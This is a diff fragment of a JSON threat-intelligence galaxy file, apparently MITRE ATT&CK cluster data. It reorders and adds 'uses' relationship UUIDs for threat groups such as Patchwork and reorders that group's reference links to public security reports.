"uses" - }, - { - "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03259939-0b57-482f-8eb5-87c0e0d54334", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416", + "dest-uuid": "0a68f1f1-da74-4d28-8d9a-696c082706cc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4707,28 +5638,7 @@ "type": "uses" }, { - "dest-uuid": "ccd61dfc-b03f-4689-8c18-7c97eab08472", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e669bb87-f773-4c7b-bfcc-a9ffebfdd8d4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f108215f-3487-489d-be8b-80e346d32518", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f460983-1bbb-4e7e-8094-f0b5e720f658", + "dest-uuid": "59a97b15-8189-4d51-9404-e1ce8ea4a069", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -4742,28 +5652,14 @@ "type": "uses" }, { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "dest-uuid": "64196062-5210-42c3-9a02-563a0d1797ef", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -4777,35 +5673,49 @@ "type": "uses" }, { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "dest-uuid": "7343e208-7cab-45f2-a47b-41ba5e2f0fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "dest-uuid": "96fd6cc4-a693-4118-83ec-619e5352d07d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "fb575479-14ef-41e9-bfab-0b7cf10bec73", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "60c18d06-7b91-4742-bae3-647845cd9d81", + "dest-uuid": "c8655260-9f4b-44e3-85e1-6538a5f6e4f4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a4f57468-fbd5-49e4-8476-52088220b92d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -4819,7 +5729,105 @@ "type": "uses" }, { - "dest-uuid": "a4f57468-fbd5-49e4-8476-52088220b92d", + "dest-uuid": "0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "60c18d06-7b91-4742-bae3-647845cd9d81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d20b397a-ea47-48a9-b503-2e2a3551e11d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ccd61dfc-b03f-4689-8c18-7c97eab08472", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f108215f-3487-489d-be8b-80e346d32518", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4870,6 +5878,13 @@ ], "type": "uses" }, + { + "dest-uuid": "853c4192-4311-43e1-bfbb-b11b14911852", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", "tags": [ @@ -4955,14 +5970,7 @@ "type": "uses" }, { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4975,34 +5983,6 @@ ], "type": "uses" }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "294e2560-bd48-44b2-9da2-833b5588ad11", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "2e45723a-31da-4a7e-aaa6-e01998a6788f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", "tags": [ 
@@ -5010,125 +5990,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4664b683-f578-434f-919b-1c1aad2a1111", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b77b563c-34bb-4fb8-86a3-3694338f7b47", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - 
"type": "uses" - }, - { - "dest-uuid": "33b9e38f-103c-412d-bdcf-904a91fff1e4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1", "tags": [ @@ -5136,6 +5997,20 @@ ], "type": "uses" }, + { + "dest-uuid": "2e45723a-31da-4a7e-aaa6-e01998a6788f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e3cedcfe-6515-4348-af65-7f2c4157bf0d", "tags": [ 
@@ -5143,6 +6018,34 @@ ], "type": "uses" }, + { + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ @@ -5151,21 +6054,7 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -5179,7 +6068,49 @@ "type": "uses" }, { - "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4664b683-f578-434f-919b-1c1aad2a1111", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "294e2560-bd48-44b2-9da2-833b5588ad11", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "33b9e38f-103c-412d-bdcf-904a91fff1e4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -5191,6 +6122,97 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b77b563c-34bb-4fb8-86a3-3694338f7b47", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "6713ab67-e25b-49cc-808d-2b36d4fbc35c", @@ -5289,13 +6311,6 @@ ], "type": "uses" }, - { - "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", "tags": [ @@ -5310,6 +6325,13 @@ ], "type": "uses" }, + { + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ @@ -5317,6 +6339,13 @@ ], "type": "uses" }, + { + "dest-uuid": "c2ffd229-11bb-4fd8-9208-edbe97b14c93", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "9108e212-1c94-4f8d-be76-1aad9b4c86a4", "tags": [ @@ -5331,13 +6360,6 @@ ], "type": "uses" }, - { - "dest-uuid": "c2ffd229-11bb-4fd8-9208-edbe97b14c93", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "fddd81e9-dd3d-477e-9773-4fb8ae227234", "tags": [ 
@@ -5356,13 +6378,13 @@ "refs": [ "https://attack.mitre.org/groups/G0040", "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", - "https://securelist.com/the-dropping-elephant-actor/75328/", "http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", + "https://securelist.com/the-dropping-elephant-actor/75328/", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/", "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf", - "http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf", - "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", - "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" + "http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf" ], "synonyms": [ "Patchwork", @@ -5395,14 +6417,7 @@ "type": "uses" }, { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "d1183cb9-258e-4f2f-8415-50ac8252c49e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -5416,49 +6431,7 @@ "type": "uses" }, { - "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "85b39628-204a-48d2-b377-ec368cbcb7ca", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5472,28 +6445,7 @@ "type": "uses" }, { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", + "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -5507,21 +6459,7 @@ "type": "uses" }, { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5535,7 +6473,7 @@ "type": "uses" }, { - "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5549,28 +6487,7 @@ "type": "uses" }, { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f5352566-1a64-49ac-8f7f-97e1d1a03300", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d1183cb9-258e-4f2f-8415-50ac8252c49e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -5583,76 +6500,6 @@ ], "type": "uses" }, - { - "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "13cd9151-83b7-410d-9f98-25d0f0d1d80d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "da04ac30-27da-4959-a67d-450ce47d9470", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ 
@@ -5660,6 +6507,13 @@ ], "type": "uses" }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", "tags": [ @@ -5667,6 +6521,41 @@ ], "type": "uses" }, + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e9595678-d269-469e-ae6b-75e49259de63", "tags": [ 
@@ -5674,12 +6563,145 @@ ], "type": "uses" }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f5352566-1a64-49ac-8f7f-97e1d1a03300", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "13cd9151-83b7-410d-9f98-25d0f0d1d80d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "85b39628-204a-48d2-b377-ec368cbcb7ca", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + 
"type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "da04ac30-27da-4959-a67d-450ce47d9470", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e494ad79-37ee-4cd0-866b-299c521d8b94", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": 